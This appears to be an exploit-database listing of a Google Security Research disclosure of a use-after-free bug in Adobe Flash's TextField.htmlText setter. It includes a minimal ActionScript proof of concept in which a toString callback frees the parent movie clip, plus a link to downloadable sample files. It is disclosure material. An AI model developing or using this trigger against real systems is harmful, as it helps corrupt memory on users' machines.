Adobe Flash TextField.htmlText Setter - Use-After-Free

2015-12-18T00:00:00
ID 1337DAY-ID-25731
Type zdt
Reporter Google Security Research
Modified 2015-12-18T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            Source: https://code.google.com/p/google-security-research/issues/detail?id=578
 
There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:
 
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.htmlText = {toString : func};
 
function func(){
 
    mc.removeMovieClip();
 
        // Fix heap here
 
    return "<b>hello</b>";
     
    }
 
A sample swf and fla are attached.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39051.zip

#  0day.today [2018-01-08]  #